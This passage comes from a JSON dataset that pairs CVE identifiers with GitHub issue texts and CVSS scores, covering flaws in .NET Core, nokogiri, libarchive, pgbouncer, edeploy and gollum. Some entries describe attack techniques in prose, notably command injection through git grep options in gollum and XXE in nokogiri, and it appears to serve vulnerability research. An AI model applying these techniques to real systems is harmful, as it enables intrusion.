Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87811. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87812. "severity": "HIGH",
  87813. "baseScore": 7.5,
  87814. "impactScore": 3.6,
  87815. "exploitabilityScore": 3.9
  87816. },
  87817. {
  87818. "CVE_ID": "CVE-2020-1108",
  87819. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/157",
  87820. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/157",
  87821. "Repo_new": "dotnet/announcements",
  87822. "Issue_Created_At": "2020-06-09T17:22:15Z",
  87823. "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability Update]. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability which exists when .NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Core application. APITAG update addresses the vulnerability by correcting how the .NET Core web application handles web requests. The previous update contained an incomplete fix, the runtime and SDK version numbers have now been updated to the runtimes and SDKs that have the complete fix. This new issue has been created for users which subscribe to the announcements via email or other automated means which may not show issue changes._ Discussion Discussion for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET NUMBERTAG application running on .NET NUMBERTAG Preview NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in [affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG For machines running .NET NUMBERTAG Preview you should download and install .NET NUMBERTAG Preview NUMBERTAG when available from FILETAG If you have multiple affected versions you must update the runtime or SDKs for each version. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG ersions that contain the patch updated NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87824. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87825. "severity": "HIGH",
  87826. "baseScore": 7.5,
  87827. "impactScore": 3.6,
  87828. "exploitabilityScore": 3.9
  87829. },
  87830. {
  87831. "CVE_ID": "CVE-2017-8700",
  87832. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/279",
  87833. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/279",
  87834. "Repo_new": "aspnet/announcements",
  87835. "Issue_Created_At": "2017-11-14T15:25:23Z",
  87836. "description": "Reserved. APITAG issue has been reserved for a potential future security announcement._ This does not mean a security advisory is coming soon, it simply gives us the ability to predict the issue number that will be used in the future.",
  87837. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87838. "severity": "HIGH",
  87839. "baseScore": 7.5,
  87840. "impactScore": 3.6,
  87841. "exploitabilityScore": 3.9
  87842. },
  87843. {
  87844. "CVE_ID": "CVE-2020-14359",
  87845. "Issue_Url_old": "https://github.com/keycloak/keycloak/issues/12934",
  87846. "Issue_Url_new": "https://github.com/keycloak/keycloak/issues/12934",
  87847. "Repo_new": "keycloak/keycloak",
  87848. "Issue_Created_At": "2022-07-05T22:29:01Z",
  87849. "description": "Contact APITAG Product Security Team and ask them to update CVETAG . Description CVEs can now be updated by a CNA and Red Hat, the major sponsor of Keycloak is now a CNA, that means updating CVEs for accuracy should be easier (yeay). CVETAG CVETAG refers to an old sibling project that was deprecated ages ago. It should be re assigned to that product or at least have a fix the CVE to reflect its status as affecting not Keycloak but Gatekeeper",
  87850. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  87851. "severity": "HIGH",
  87852. "baseScore": 7.3,
  87853. "impactScore": 3.4,
  87854. "exploitabilityScore": 3.9
  87855. },
  87856. {
  87857. "CVE_ID": "CVE-2020-14040",
  87858. "Issue_Url_old": "https://github.com/golang/go/issues/39491",
  87859. "Issue_Url_new": "https://github.com/golang/go/issues/39491",
  87860. "Repo_new": "golang/go",
  87861. "Issue_Created_At": "2020-06-09T22:14:39Z",
  87862. "description": "x/text: UTF NUMBERTAG decoder behaves incorrectly on single byte input. When using UTF NUMBERTAG decoder with BOM to decode a single byte string, the decoder incorrectly returns APITAG . This code can be used to reproduce this issue: ERRORTAG",
  87863. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87864. "severity": "HIGH",
  87865. "baseScore": 7.5,
  87866. "impactScore": 3.6,
  87867. "exploitabilityScore": 3.9
  87868. },
  87869. {
  87870. "CVE_ID": "CVE-2022-24686",
  87871. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/12036",
  87872. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/12036",
  87873. "Repo_new": "hashicorp/nomad",
  87874. "Issue_Created_At": "2022-02-09T23:52:57Z",
  87875. "description": "placeholder.",
  87876. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  87877. "severity": "MEDIUM",
  87878. "baseScore": 5.9,
  87879. "impactScore": 3.6,
  87880. "exploitabilityScore": 2.2
  87881. },
  87882. {
  87883. "CVE_ID": "CVE-2019-10214",
  87884. "Issue_Url_old": "https://github.com/containers/image/issues/654",
  87885. "Issue_Url_new": "https://github.com/containers/image/issues/654",
  87886. "Repo_new": "containers/image",
  87887. "Issue_Created_At": "2019-07-11T10:50:18Z",
  87888. "description": "podman login not working with certificate authentication. Hi, we have an Artifactory running behind a load balancer that uses certificate authentication. When we try to podman login we get the error ERRORTAG When using docker login the login succeeds. When using podman login it tries to reuse the existing login but also fails again: ERRORTAG I guess that the error is probably in this area as the certificates from the APITAG are not used: URLTAG I will try to fix it in the next days but I'm not very familiar with the code base yet so if you see an easy fix we would appreciate that, otherwise I would also appreciate some guidance. Thanks!",
  87889. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87890. "severity": "MEDIUM",
  87891. "baseScore": 5.9,
  87892. "impactScore": 3.6,
  87893. "exploitabilityScore": 2.2
  87894. },
  87895. {
  87896. "CVE_ID": "CVE-2002-20001",
  87897. "Issue_Url_old": "https://github.com/mozilla/ssl-config-generator/issues/162",
  87898. "Issue_Url_new": "https://github.com/mozilla/ssl-config-generator/issues/162",
  87899. "Repo_new": "mozilla/ssl-config-generator",
  87900. "Issue_Created_At": "2021-10-23T22:32:53Z",
  87901. "description": "Stop recommending DHE, because of \"dheater\" vulnerability. These guys URLTAG found a way to saturate the server CPU core to NUMBERTAG using as little as NUMBERTAG KB/s of incoming traffic. The pre requisite is that the server supports DHE as the key exchange. Therefore, to avoid creating such a vulnerable configuration, I propose removing DHE from all levels of SSL config.",
  87902. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87903. "severity": "HIGH",
  87904. "baseScore": 7.5,
  87905. "impactScore": 3.6,
  87906. "exploitabilityScore": 3.9
  87907. },
  87908. {
  87909. "CVE_ID": "CVE-2012-6685",
  87910. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/693",
  87911. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/693",
  87912. "Repo_new": "sparklemotion/nokogiri",
  87913. "Issue_Created_At": "2012-06-06T09:34:24Z",
  87914. "description": "nokogiri vulnerable to XXE attack when used under c ruby. Using external xml entities you can specify URLs (e.g. HTTP) to be contacted when attacker supplied XML is parsed. This can be used to trigger URLs on the internal network of a XML parsing service and potentially leak their responses. External xml entities should be completely (file, http, etc.) disabled. CODETAG",
  87915. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87916. "severity": "HIGH",
  87917. "baseScore": 7.5,
  87918. "impactScore": 3.6,
  87919. "exploitabilityScore": 3.9
  87920. },
  87921. {
  87922. "CVE_ID": "CVE-2013-20001",
  87923. "Issue_Url_old": "https://github.com/openzfs/zfs/issues/1894",
  87924. "Issue_Url_new": "https://github.com/openzfs/zfs/issues/1894",
  87925. "Repo_new": "openzfs/zfs",
  87926. "Issue_Created_At": "2013-11-22T15:08:00Z",
  87927. "description": "sharenfs and IP NUMBERTAG on Ubuntu NUMBERTAG I am trying to share a zfs filesystem over both IP NUMBERTAG and IP NUMBERTAG but just cannot get it to work. I know the support is there in native NFS, as it works fine for non zfs filesystems. Here is an example: > sudo zfs set PATHTAG disk1/home > sudo exportfs a > showmount e > /home NUMBERTAG home NUMBERTAG home NUMBERTAG home NUMBERTAG home APITAG I have tried the address both with and w/o square brackets, it doesn't make any difference. Any ideas if there is a magic syntax for IP NUMBERTAG addresses? Or is this just a bug/",
  87928. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87929. "severity": "HIGH",
  87930. "baseScore": 7.5,
  87931. "impactScore": 3.6,
  87932. "exploitabilityScore": 3.9
  87933. },
  87934. {
  87935. "CVE_ID": "CVE-2013-4144",
  87936. "Issue_Url_old": "https://github.com/wordpress/secure-swfupload/issues/1",
  87937. "Issue_Url_new": "https://github.com/wordpress/secure-swfupload/issues/1",
  87938. "Repo_new": "wordpress/secure-swfupload",
  87939. "Issue_Created_At": "2013-07-03T18:00:54Z",
  87940. "description": "Image object injection vulnerability via APITAG parameter. I've received a few reports today of an image object injection problem in swfupload affecting APITAG I'm filing this public issue here after contacting swfupload EMAILTAG rg and being asked to do so (as this issue is already public knowledge). There's an object injection \"vulnerability\" in swfupload, as shown by this demo URL: FILETAG Known advisories for this issue: URLTAG FILETAG This was tested on APITAG NUMBERTAG As discussed on e mail, there are three basic options: Remove APITAG Restrict APITAG to same origin Ignore the issue My recommendation would be to restrict APITAG to the same origin as the blog site, as swfupload is already deprecated, and I'd rather it be secure but slightly broken than have a known issue that could be used for spoofing or other issues. Thanks!",
  87941. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87942. "severity": "CRITICAL",
  87943. "baseScore": 9.8,
  87944. "impactScore": 5.9,
  87945. "exploitabilityScore": 3.9
  87946. },
  87947. {
  87948. "CVE_ID": "CVE-2014-8174",
  87949. "Issue_Url_old": "https://github.com/redhat-cip/edeploy/issues/230",
  87950. "Issue_Url_new": "https://github.com/redhat-cip/edeploy/issues/230",
  87951. "Repo_new": "redhat-cip/edeploy",
  87952. "Issue_Created_At": "2015-03-17T23:23:07Z",
  87953. "description": "use of HTTP to download sensitive files CVETAG . Found in a past security audit, agreed with Tristan to make public and file issues here. Please see CVETAG edeploy uses HTTP to download a large number of sensitive files which can lead to code execution: PATHTAG value=http://{{ APITAG }}/ PATHTAG echo APITAG { Retries NUMBERTAG HTTP { Proxy URLTAG {HTTP_PROXY} ; }; };\" >> PATHTAG PATHTAG curl o PATHTAG FILETAG ~bpo NUMBERTAG ARCH:=amd NUMBERTAG deb PATHTAG echo \"deb URLTAG $dist security main universe multiverse\" >> PATHTAG PATHTAG echo \"deb FILETAG $dist/updates main\" > PATHTAG PATHTAG wget O FILETAG | do_chroot $target apt key add PATHTAG echo \"deb URLTAG ${dist} main\" > PATHTAG PATHTAG wget O FILETAG | do_chroot $target apt key add PATHTAG echo \"deb URLTAG precise main\" > PATHTAG PATHTAG wget O FILETAG | do_chroot $target apt key add PATHTAG echo \"deb URLTAG ${dist} main\" > PATHTAG PATHTAG wget no verbose URLTAG O PATHTAG PATHTAG FILETAG PATHTAG do_chroot $dir rpm import FILETAG PATHTAG do_chroot $dir rpm import FILETAG PATHTAG URLTAG PATHTAG wget no verbose URLTAG PATHTAG PACKAGES=\"$PACKAGES numpy FILETAG \" PATHTAG PACKAGES=\"$PACKAGES python psutil FILETAG FILETAG \" PATHTAG PACKAGES=\"$PACKAGES FILETAG FILETAG \" PATHTAG curl s S o/configure F section=${SECTION} F FILETAG URLTAG PATHTAG & PATHTAG give_up APITAG exited as failed ($RET_CODE). Cannot get a configuration from URLTAG PATHTAG PATHTAG log APITAG files from URLTAG PATHTAG PATHTAG curl s S URLTAG PATHTAG | gzip d | tar x xattrs selinux C $d || give_up APITAG to download URLTAG PATHTAG PATHTAG curl URLTAG fso /user data m NUMBERTAG retry NUMBERTAG retry delay NUMBERTAG PATHTAG curl s S APITAG F section=${SECTION} F file= APITAG URLTAG PATHTAG || : PATHTAG curl s S F section=${SECTION} F failure=$PROFILE F FILETAG URLTAG PATHTAG PATHTAG s S $SESSION_CURL F FILETAG URLTAG PATHTAG & PATHTAG log APITAG exited as failed ($RET_CODE). Cannot get a configuration from URLTAG PATHTAG PATHTAG PACKAGES=\"$PACKAGES FILETAG \" PATHTAG echo \" URLTAG \" PATHTAG echo \" URLTAG \" PATHTAG echo \" FILETAG \" PATHTAG echo \" FILETAG \" PATHTAG wget \" FILETAG \" O PATHTAG Binary file PATHTAG matches PATHTAG URLTAG PATHTAG curl i F name=test F PATHTAG FILETAG PATHTAG curl i F name=test F PATHTAG FILETAG . APITAG page = FILETAG PATHTAG Command line: BOOT_IMAGE=vmlinuz initrd= FILETAG DEBUG NUMBERTAG APITAG APITAG UPLOAD_LOG NUMBERTAG IP=all:dhcp SESSION=smoke NONETWORKTEST NUMBERTAG ONSUCCESS=console ONFAILURE=console |pci=bfsort| PATHTAG Kernel command line: BOOT_IMAGE=vmlinuz initrd= FILETAG DEBUG NUMBERTAG APITAG APITAG UPLOAD_LOG NUMBERTAG IP=all:dhcp SESSION=smoke NONETWORKTEST NUMBERTAG ONSUCCESS=console ONFAILURE=console |pci=bfsort|",
  87954. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87955. "severity": "CRITICAL",
  87956. "baseScore": 9.8,
  87957. "impactScore": 5.9,
  87958. "exploitabilityScore": 3.9
  87959. },
  87960. {
  87961. "CVE_ID": "CVE-2014-9489",
  87962. "Issue_Url_old": "https://github.com/gollum/gollum/issues/913",
  87963. "Issue_Url_new": "https://github.com/gollum/gollum/issues/913",
  87964. "Repo_new": "gollum/gollum",
  87965. "Issue_Created_At": "2014-12-04T13:54:16Z",
  87966. "description": "APITAG Remote Code Execution Vulnerability, please update. There was a remote code execution vulnerability in versions of gollum < APITAG (just released). Technically, the bug was in the APITAG gem dependency which was introduced in APITAG , but I suspect that the same exploitable code existed in the APITAG dependency before that version (untested). Please update gollum to APITAG ( gem update gollum ): that will update the dependencies. (If anyone uses APITAG without the gollum frontend, please APITAG ). The bug exploits the fact that grit uses command line calls to git grep to implement search functionality. git grep takes a APITAG or APITAG option that will basically pipe the results of grep to an arbitrary process. For example, in vulnerable versions of gollum, searching for APITAG creates the file APITAG (but any arbitrary command will work, so that an attacker could setup shell access to the exploited server). However, this will only work if grep finds the string master (or whatever is the default branch that gollum uses) in any of the wiki's documents. See here for the vulnerable code and fix: URLTAG Many thanks to MENTIONTAG for reporting this. MENTIONTAG MENTIONTAG MENTIONTAG please have a look and see if I didn't miss anything. One more reason to ditch grit in favour of rugged. EDIT: fixed gollum version numbers",
  87967. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  87968. "severity": "HIGH",
  87969. "baseScore": 8.8,
  87970. "impactScore": 5.9,
  87971. "exploitabilityScore": 2.8
  87972. },
  87973. {
  87974. "CVE_ID": "CVE-2015-20107",
  87975. "Issue_Url_old": "https://github.com/python/cpython/issues/68966",
  87976. "Issue_Url_new": "https://github.com/python/cpython/issues/68966",
  87977. "Repo_new": "python/cpython",
  87978. "Issue_Created_At": "2015-08-02T08:25:07Z",
  87979. "description": "APITAG document shell command Injection danger in filename parameter. BPO NUMBERTAG CVETAG | : Nosy | MENTIONTAG MENTIONTAG Files | APITAG CVETAG APITAG as image/png at NUMBERTAG by APITAG APITAG APITAG Quote APITAG CVETAG APITAG as text/plain at NUMBERTAG by APITAG APITAG APITAG [mailcap APITAG CVETAG APITAG as application/zip at NUMBERTAG by APITAG mailcap.py patches and diffs for python NUMBERTAG and python NUMBERTAG APITAG APITAG Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state. APITAG APITAG more details APITAG APITAG APITAG fields: ERRORTAG APITAG fields: ERRORTAG APITAG APITAG",
  87980. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
  87981. "severity": "HIGH",
  87982. "baseScore": 7.6,
  87983. "impactScore": 4.7,
  87984. "exploitabilityScore": 2.8
  87985. },
  87986. {
  87987. "CVE_ID": "CVE-2015-3206",
  87988. "Issue_Url_old": "https://github.com/apple/ccs-pykerberos/issues/31",
  87989. "Issue_Url_new": "https://github.com/apple/ccs-pykerberos/issues/31",
  87990. "Repo_new": "apple/ccs-pykerberos",
  87991. "Issue_Created_At": "2014-01-25T00:01:14Z",
  87992. "description": "APITAG is insecure. _res APITAG originally submitted this as _ ticket NUMBERTAG URLTAG _ The python kerberos APITAG method is badly insecure. It does a kinit (AS REQ) to ask a KDC for a TGT for the given user principal, and interprets the success or failure of that as indicating whether the password is correct. It does not, however, verify that it actually spoke to a trusted KDC: an attacker may simply reply instead with an AS REP which matches the password he just gave you. Imagine you were verifying a password using LDAP authentication rather than Kerberos: you would, of course, use TLS in conjunction with LDAP to make sure you were talking to a real, trusted LDAP server. The same requirement applies here. kinit is not a password verification service. The usual way of doing this is to take the TGT you've obtained with the user's password, and then obtain a ticket for a principal for which the verifier has keys (e.g. a web server processing a username/password form login might get a ticket for its own HTTP/host MENTIONTAG principal), which it can then verify. Note that this requires that the verifier have its own Kerberos identity, which is mandated by the symmetric nature of Kerberos (whereas in the LDAP case, the use of public key cryptography allows anonymous verification). If this is not implemented, the documentation should at least indicate that there is no protection against KDC spoofing attacks here.",
  87993. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87994. "severity": "HIGH",
  87995. "baseScore": 8.1,
  87996. "impactScore": 5.9,
  87997. "exploitabilityScore": 2.2
  87998. },
  87999. {
  88000. "CVE_ID": "CVE-2015-4054",
  88001. "Issue_Url_old": "https://github.com/pgbouncer/pgbouncer/issues/42",
  88002. "Issue_Url_new": "https://github.com/pgbouncer/pgbouncer/issues/42",
  88003. "Repo_new": "pgbouncer/pgbouncer",
  88004. "Issue_Created_At": "2015-03-26T15:11:10Z",
  88005. "description": "pgbouncer NUMBERTAG segmentation fault. Hello, we're suffering from a segmentation fault every now and than on APITAG NUMBERTAG with pgbouncer NUMBERTAG The instance is dying with the following message: pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG fffa NUMBERTAG ea NUMBERTAG error NUMBERTAG in pgbouncer NUMBERTAG pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG fff NUMBERTAG fbe7b0 error NUMBERTAG in pgbouncer NUMBERTAG pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG fffaf NUMBERTAG a NUMBERTAG error NUMBERTAG in pgbouncer NUMBERTAG pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG fffbd NUMBERTAG error NUMBERTAG in pgbouncer NUMBERTAG pgbouncer NUMBERTAG segfault at NUMBERTAG ip NUMBERTAG d NUMBERTAG sp NUMBERTAG ffffe0dc2c0 error NUMBERTAG in pgbouncer NUMBERTAG We've attached gdb to a core file and traced the issue down to an uninitialized struct: Program terminated with signal NUMBERTAG Segmentation fault NUMBERTAG d NUMBERTAG in check_client_passwd (client NUMBERTAG f NUMBERTAG pkt NUMBERTAG ffffe0dc NUMBERTAG at APITAG NUMBERTAG src/client.c: No such file or directory. in src/client.c Missing separate debuginfos, use: debuginfo install glibc NUMBERTAG APITAG libevent NUMBERTAG APITAG nss softokn freebl NUMBERTAG APITAG (gdb) bt NUMBERTAG d NUMBERTAG in check_client_passwd (client NUMBERTAG f NUMBERTAG pkt NUMBERTAG ffffe0dc NUMBERTAG at APITAG NUMBERTAG handle_client_startup (client NUMBERTAG f NUMBERTAG pkt NUMBERTAG ffffe0dc NUMBERTAG at APITAG NUMBERTAG in client_proto (sbuf NUMBERTAG f NUMBERTAG evtype=<value optimized out>, data=<value optimized out>) at APITAG NUMBERTAG e in sbuf_call_proto (sbuf=<value optimized out>, event=<value optimized out>) at APITAG NUMBERTAG bb in sbuf_process_pending (sbuf NUMBERTAG f NUMBERTAG at APITAG NUMBERTAG a8 in sbuf_main_loop (sbuf NUMBERTAG f NUMBERTAG skip_recv=<value optimized out>) at APITAG NUMBERTAG in sbuf_accept (sbuf NUMBERTAG f NUMBERTAG sock=<value optimized out>, is_unix=false) at APITAG NUMBERTAG b NUMBERTAG in accept_client (sock NUMBERTAG is_unix=false) at APITAG NUMBERTAG eafc in pool_accept (sock NUMBERTAG flags=<value optimized out>, arg=<value optimized out>) at APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG in event_base_loop () from PATHTAG NUMBERTAG a3 in main_loop_once () at APITAG NUMBERTAG e NUMBERTAG in main (argc=<value optimized out>, argv=<value optimized out>) at APITAG after looking at APITAG we see that the passwd var is valid however the APITAG struct (or APITAG struct) must be invalid: (gdb) printf \"%s\", passwd md5XXXXXXXXXXXXXXXXXXXXXXXXX (gdb) printf \"%s\", user >passwd Cannot access memory at address NUMBERTAG The application log does not show any conclusive info. Please tell me if you need more information. Thanks for help, Wiktor",
  88006. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88007. "severity": "HIGH",
  88008. "baseScore": 7.5,
  88009. "impactScore": 3.6,
  88010. "exploitabilityScore": 3.9
  88011. },
  88012. {
  88013. "CVE_ID": "CVE-2015-8916",
  88014. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/504",
  88015. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/504",
  88016. "Repo_new": "libarchive/libarchive",
  88017. "Issue_Created_At": "2015-04-11T17:16:06Z",
  88018. "description": "malformed rar crashes bsdtar. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG CODETAG See attachment: FILETAG See attachment: FILETAG See attachment: FILETAG",
  88019. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88020. "severity": "MEDIUM",
  88021. "baseScore": 6.5,
  88022. "impactScore": 3.6,
  88023. "exploitabilityScore": 2.8
  88024. },
  88025. {
  88026. "CVE_ID": "CVE-2015-8917",
  88027. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/505",
  88028. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/505",
  88029. "Repo_new": "libarchive/libarchive",
  88030. "Issue_Created_At": "2015-04-11T17:16:11Z",
  88031. "description": "malformed cab segfaults bsdtar. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG CODETAG See attachment: FILETAG See attachment: FILETAG See attachment: FILETAG",
  88032. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88033. "severity": "HIGH",
  88034. "baseScore": 7.5,
  88035. "impactScore": 3.6,
  88036. "exploitabilityScore": 3.9
  88037. },
  88038. {
  88039. "CVE_ID": "CVE-2015-8927",
  88040. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/523",
  88041. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/523",
  88042. "Repo_new": "libarchive/libarchive",
  88043. "Issue_Created_At": "2015-04-11T17:17:10Z",
  88044. "description": "Invalid memory read on zip file in function APITAG after entering empty password. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG ERRORTAG See attachment: FILETAG See attachment: FILETAG",
  88045. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88046. "severity": "MEDIUM",
  88047. "baseScore": 5.5,
  88048. "impactScore": 3.6,
  88049. "exploitabilityScore": 1.8
  88050. },
  88051. {
  88052. "CVE_ID": "CVE-2015-8929",
  88053. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/517",
  88054. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/517",
  88055. "Repo_new": "libarchive/libarchive",
  88056. "Issue_Created_At": "2015-04-11T17:16:46Z",
  88057. "description": "memory leak in __archive_read_get_extract. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG CODETAG",
  88058. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88059. "severity": "MEDIUM",
  88060. "baseScore": 5.5,
  88061. "impactScore": 3.6,
  88062. "exploitabilityScore": 1.8
  88063. },
  88064. {
  88065. "CVE_ID": "CVE-2015-8930",
  88066. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/522",
  88067. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/522",
  88068. "Repo_new": "libarchive/libarchive",
  88069. "Issue_Created_At": "2015-04-11T17:17:10Z",
  88070. "description": "Malformed ISO file hangs bsdtar. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG APITAG See attachment: FILETAG",
  88071. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88072. "severity": "HIGH",
  88073. "baseScore": 7.5,
  88074. "impactScore": 3.6,
  88075. "exploitabilityScore": 3.9
  88076. },
  88077. {
  88078. "CVE_ID": "CVE-2015-8934",
  88079. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/521",
  88080. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/521",
  88081. "Repo_new": "libarchive/libarchive",
  88082. "Issue_Created_At": "2015-04-11T17:17:10Z",
  88083. "description": "Invalid read in function APITAG when unpacking malformed rar. Original issue NUMBERTAG URLTAG created by Google Code user APITAG on NUMBERTAG APITAG ERRORTAG See attachment: FILETAG See attachment: FILETAG",
  88084. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88085. "severity": "MEDIUM",
  88086. "baseScore": 5.5,
  88087. "impactScore": 3.6,
  88088. "exploitabilityScore": 1.8
  88089. },
  88090. {
  88091. "CVE_ID": "CVE-2015-9537",
  88092. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/1",
  88093. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/1",
  88094. "Repo_new": "cybersecurityworks/disclosed",
  88095. "Issue_Created_At": "2015-08-27T13:22:02Z",
  88096. "description": "Multiple XSS in APITAG Gallery by Photocrati Version NUMBERTAG",
  88097. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  88098. "severity": "MEDIUM",
  88099. "baseScore": 5.4,
  88100. "impactScore": 2.7,
  88101. "exploitabilityScore": 2.3
  88102. },
  88103. {
  88104. "CVE_ID": "CVE-2016-10530",
  88105. "Issue_Url_old": "https://github.com/airbrake/node-airbrake/issues/70",
  88106. "Issue_Url_new": "https://github.com/airbrake/node-airbrake/issues/70",
  88107. "Repo_new": "airbrake/node-airbrake",
  88108. "Issue_Created_At": "2016-01-26T22:18:46Z",
